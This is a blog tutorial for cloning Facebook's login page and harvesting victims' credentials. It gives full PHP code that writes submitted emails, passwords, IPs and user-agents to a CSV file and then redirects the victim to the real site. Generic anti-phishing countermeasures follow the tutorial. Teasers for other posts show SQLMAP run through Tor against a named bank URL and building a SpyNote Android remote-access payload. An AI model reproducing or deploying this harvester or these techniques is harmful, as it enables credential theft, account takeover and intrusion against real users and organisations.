Skip to main content

Facebook Phishing

Capturing username and password using phishing page

Legal disclaimer:

Usage of phishing for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

STEP 1:

Install Xampp and start the Apache Service.


STEP 2:

Open facebook.com and copy the source (ctrl + U) into a notepad file.
Search for "action=" in the code and replace the URL following it with "capture.php"
(only first 2 occurances needs to be changed)
Save it as index.html


STEP 3:

Create a new text file and write the following code in it:
<?php
// Redirect
header("Location:https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110");
// Get IP address
$ip = isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];
// Get user-agent
$useragent = $_SERVER['HTTP_USER_AGENT'];
// Save credentials, IP address and user-agent
if(isset($_POST[email]) && isset($_POST[pass])) {$file = fopen("dump.csv", "a");fputcsv($file, array($_POST[email], $_POST[pass], $ip, $useragent));fclose($file);}
// Exit
exit;
?>
Save this file as capture.php

STEP 4: 

Navigate to C:\xampp\htdocs\
Create a new folder with the name facebook (u can choose any random name)
Copy and paste the index.html and capture.php file here.
Create a new file with the name "dump.csv"  (to save the captured data)

STEP 5:

Open any browser and open http://localhost/facebook/
Duplicate page will be opened, enter the credentials here.
After providing the credentials it will redirect you to the login attempt page.


STEP 6:

Open up the folder where the dump.csv file is kept
Open dump.csv file to find the captured password.

Countermeasures:

Here are my recommendations on how to defend against phishing attacks:

1. Filter emails for phishing threats
It's important that you filter your emails for malicious URLs and attachments to prevent phishing emails making it to your users in the first place. Sandboxing can detect a lot of the malware in emails, but make sure that you have a follow up plan in place if you're deploying this technology in detection rather than blocking mode – otherwise the malware is still live on your systems. Use security analytics to filter out malicious URLs. 

2. Update client-side operating systems, software, and plug-ins
Some phishing emails include URLs to exploit vulnerabilities in the browsers and its plug-ins, such as Flash and Java; others send file attachments that try to exploit applications like Adobe Acrobat or Microsoft Office. That's why it's important to patch vulnerabilities on your endpoints as well. Many organizations already have a vulnerability management program in place but only scan servers. Make sure you extend coverage to your endpoints and patch operating systems, software, and plug-ins. This not only protects you from phishing emails but also drive-by attacks.

3. Harden Your Clients
Lock down your clients as much as possible. This includes things like not making your users local administrators and deploying mitigation tools like Microsoft EMET (check out this Whiteboard Wednesday on EMET on how to deploy this free tool).

4. Block Internet-bound SMB and Kerberos traffic
One of our penetration testing team's favorites is to use an SMB authentication attack. In this scenario, the attacker sets up an SMB service on the Internet and sends a phishing email with a URL or Word document that references an image through file:// rather than http://. This tricks the computer to authenticate with the domain credentials to the SMB service, providing the attacker with a user name and password hash. The hash can then be cracked or used in pass the hash attacks. To defend against SMB and Kerberos attacks, you should block TCP ports 88, 135, 139, 445 and UDP ports 88, 137, 138 for non-RFC 1918 IP addresses, both on the perimeter and the host-based firewalls. You'll want to have a process in place to detect compromised credentials

5. Detect malware on endpoints
Many phishing attacks involve malware that steal your data or passwords. You should have technology in place to detect malware on the endpoint. Regular anti-virus is great for catching commodity malware, which is likely the bulk of what you will see used against you. There are also many new endpoint detection vendors out there that have great alternative technologies.

6. Detect compromised credentials and lateral movement
Even with all of these protections in place, your users may still fall prey to credential harvesting attacks. A common phishing attack is leading users to a fake Outlook Web Access page and asking them to enter their domain credentials to log on, but there are many variations. Once the attackers have the passwords, they can impersonate users.

7. Implement 2-factor authentication
Add 2-factor authentication (2FA) to any externally-facing system to stop attackers from using stolen passwords. 

8. Enable SPF and DKIM
There are two standards that help determine if an email actually came from the sender domain it claims to detect email spoofing. The first one is the Sender Policy Framework (SPF), which adds an list to your DNS records that includes all servers that are authorized to send mail on your behalf. The second standard is DomainKeys Identified Mail (DKIM), which is a way for an email server to digitally sign all outgoing mail, proving that an email came from a specific domain and was not altered during transportation. Together, they raise the confidence in the authenticity of the sender and email content by the recipient. To help improve security hygiene, check that your systems have both SPF and DKIM enabled on your outgoing email. For incoming email, you should check if a the sender domain has SPF set up and the email came from an authorized server, and that DKIM signed emails have not been tampered with. While these protections are not bullet proof against targeted attacks that register look-alike domains, they can help filter out a lot of mass phishing.

9. Train your employees on security awareness
While even educated users won't catch everything, they are worth investing in. Train your users about how to detect phishing emails and send them simulated phishing campaigns to test their knowledge. Use the carrot, not the stick: Offer prizes for those that detect phishing emails to create a positive security-aware culture – and extend the bounty from simulated to real phishing emails. Whenever you see new phishing emails targeting your company, alert your employees about them using sample screenshots of the emails with phishy features highlighted.

10. Have an incident response plan
Even if you put all of these protections in place, some phishing emails will get through, especially if they are targeted against your organization and tailored to the individual. It's not whether these emails will get through but how well you are prepared to respond to intruders on the network.

Reviews and Comments will be appreciated. Thanks ☺

Labels:

Comments

Post a Comment

Popular posts from this blog

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...
3 comments
Read more

Android Hacking

Hacking Android using SPYNOTE Prerequisites: Android Device Windows 10 SpyNote Java  STEP 1: Download and Execute SpyNote (spynote.us is taken down by Department of Homeland Security) DOWNLOAD STEP 2: Provide the Port number and Java path if asked or leave everything as default.   STEP 3: Navigate to Tools menu and select Payload. Fill in the reverse IP and other app details. Here in this step you can configure the properties of the Payload If you plan to merge this payload with any legit application then browse that application here. STEP 4: Now click on build, it will trigger apktool and the apk will be created  . STEP 5:  Now copy the apk file to the android device using any medium like file sharing websites (mega.nz) STEP 6: Install the apk in the android device. You will get a session on the SPYNOTE interface. Right click on the session and explore multiple options. As you can see there are multiple options available now, in short the mobile device is in your co...
31 comments
Read more

NMAP - NSE Scripts (Advanced)

Vulnerability scanning using NSE in Nmap.  Note: I have written this tutorial taking the fact into consideration that the user is well versed with basic NMAP commands. For basic NMAP commands please refer the cheat-sheet given below: Basic Scanning Techniques • Scan a single target :                                                                   nmap [target] • Scan multiple targets:                                                                nmap [target1,target2,etc] • Scan a list of targets                                               ...
4 comments
Read more